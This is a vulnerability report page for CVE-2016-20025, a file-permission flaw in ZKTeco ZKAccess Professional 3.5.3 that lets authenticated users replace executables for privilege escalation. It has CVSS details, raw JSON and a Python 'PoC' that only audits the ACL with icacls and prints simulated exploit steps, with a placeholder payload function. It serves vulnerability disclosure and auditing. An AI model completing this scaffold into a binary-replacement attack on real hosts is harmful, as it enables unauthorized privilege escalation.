Security Vulnerability Report
CVE-2016-20025 CVSS 8.8 HIGH

CVE-2016-20025

Published: 2026-03-16 14:17:49
Last Modified: 2026-04-15 14:56:46

Description

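ZKTeco ZKAccess Professional 3.5.3 contains an insecure file permissions vulnerability that allows authenticated users to escalate privileges by modifying executable files. Attackers can leverage the Modify permission granted to the Authenticated Users group to replace executable binaries with malicious code for privilege escalation. The escalation takes effect when the replaced binary is next run by a more privileged account, for example an administrator launching the application or a system restart.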

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKAccess Professional 3.5.3

PoC / Exploit Code

⚠ For Security Research Only
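The following code is for security research and authorized testing only. As listed, it only reads the target's ACL with icacls and prints status messages; it does not write, copy or replace any file.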
python
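#!/usr/bin/env python3
"""
CVE-2016-20025 PoC - ZKTeco ZKAccess Professional Privilege Escalation

Audits the ACL of the ZKAccess executable for the insecure file permission
described in CVE-2016-20025: a write-capable right (Modify, Write or Full
control) granted to the Authenticated Users group.

The script is read-only. It runs ``icacls`` against the target, reports
whether the weak ACE is present, and prints what the remaining stages would
do; it never writes, copies or replaces a file.

Mitigation for a confirmed finding: restrict write access on the
installation directory and its binaries to administrative principals, then
re-run this check.

WARNING: For authorized security testing only.
"""

import os
import sys
import ctypes
import re
import subprocess

# icacls prints every access mask and inheritance flag in its own pair of
# parentheses, e.g. "(I)(M)" or "(OI)(CI)(F)"; specific rights may be
# comma-separated inside one pair.
_ACE_TOKEN = re.compile(r"\(([^)]*)\)")

# Simple rights that let the holder change or replace a file:
# F = full control, M = modify, W = write.
WRITE_RIGHTS = frozenset({"F", "M", "W"})


def acl_grants_write(acl_text, principal="Authenticated Users"):
    """
    Return True when icacls output grants *principal* a write-capable right.

    Args:
        acl_text: Text printed by ``icacls <path>``.
        principal: Account or group name to look for. The name is matched as
            plain text, so a localized Windows install that prints a
            translated group name needs that name passed in.

    Returns:
        True if an allow entry for *principal* carries F, M or W, whether
        the entry is inherited "(I)" or set explicitly; False otherwise.
    """
    marker = f"{principal}:"
    for line in acl_text.splitlines():
        _, found, ace = line.partition(marker)
        if not found:
            continue
        tokens = set()
        for group in _ACE_TOKEN.findall(ace):
            tokens.update(part.strip().upper() for part in group.split(","))
        # A deny or no-access entry restricts the principal; it is not a grant.
        if "DENY" in tokens or "N" in tokens:
            continue
        if tokens & WRITE_RIGHTS:
            return True
    return False


def check_file_permissions(file_path):
    """
    Check if the target file has insecure permissions

    Runs ``icacls`` on *file_path*, prints the ACL, and returns True when
    Authenticated Users holds Modify, Write or Full control. Returns False
    when the right is absent or when icacls cannot be run or fails (for
    example on a non-Windows host or a missing file).
    """
    try:
        # Argument list, not a shell string, so the path is never
        # interpreted by a shell.
        result = subprocess.run(
            ['icacls', file_path],
            capture_output=True,
            text=True
        )
    except (OSError, subprocess.SubprocessError) as e:
        print(f"[-] Error checking permissions: {e}")
        return False

    if result.returncode != 0:
        # Without this check a failed query prints an empty ACL and is
        # indistinguishable from a clean result.
        print(f"[-] icacls failed for {file_path}: {result.stderr.strip()}")
        return False

    print(f"[*] Current permissions for {file_path}:")
    print(result.stdout)

    if acl_grants_write(result.stdout):
        print("[!] VULNERABLE: Authenticated Users has Modify/Write permission")
        return True
    return False


def create_malicious_executable(output_path):
    """
    Placeholder for the payload-staging step of the demonstration.

    Nothing is generated or written: the function only prints the path the
    demonstration refers to and returns True.
    """
    print(f"[*] Malicious executable would be saved to: {output_path}")
    return True


def exploit_vulnerability(target_exe, backup_exe):
    """
    Walk through the privilege-escalation scenario without changing the host.

    Args:
        target_exe: Path of the executable whose ACL is audited.
        backup_exe: Path where a backup copy would be placed; only printed.

    Returns:
        True when the insecure ACE is present on *target_exe*, False when it
        is absent or could not be checked.
    """
    print("[*] Starting privilege escalation check (simulation only)...")

    # Step 1: confirm the weak ACL before reporting anything else.
    if not check_file_permissions(target_exe):
        print("[-] Target is not vulnerable")
        return False

    # Step 2: the backup is described, not performed.
    print(f"[*] Simulation: {target_exe} would be backed up to {backup_exe}")

    # Step 3: the staging helper is a placeholder that writes nothing.
    create_malicious_executable(target_exe)

    # Step 4: report the finding accurately; no file was modified, so no
    # escalation has taken place.
    print("[*] No files were modified. A replaced binary would run when the "
          "system restarts or an administrator launches the application.")
    print("[+] Finding confirmed: Authenticated Users can replace this binary")
    return True


if __name__ == "__main__":
    target = r"C:\Program Files\ZKTeco\ZKAccess\ZKAccess.exe"
    backup = r"C:\Temp\ZKAccess_backup.exe"

    print("CVE-2016-20025 PoC - ZKTeco ZKAccess Privilege Escalation")
    print("=" * 60)

    # ctypes.windll and icacls exist only on Windows; stop early elsewhere
    # instead of failing with AttributeError.
    if os.name != "nt":
        print("[-] This check relies on icacls and must be run on Windows")
        sys.exit(1)

    # Check if running with appropriate privileges
    if ctypes.windll.shell32.IsUserAnAdmin():
        print("[*] Running as Administrator - can verify vulnerability")
    else:
        print("[*] Running as limited user - simulating attack scenario")

    exploit_vulnerability(target, backup)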

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20025", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:48.573", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKAccess Professional 3.5.3 contains an insecure file permissions vulnerability that allows authenticated users to escalate privileges by modifying executable files. Attackers can leverage the Modify permission granted to the Authenticated Users group to replace executable binaries with malicious code for privilege escalation."}, {"lang": "es", "value": "ZKTeco ZKAccess Professional 3.5.3 contiene una vulnerabilidad de permisos de archivo inseguros que permite a los usuarios autenticados escalar privilegios modificando archivos ejecutables. Los atacantes pueden aprovechar el permiso de Modificar otorgado al grupo de Usuarios Autenticados para reemplazar binarios ejecutables con código malicioso para la escalada de privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016080265", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116486", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138566", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40323/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkaccess-professional-privilege-escalation-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php", "source": "[email protected]"}]}}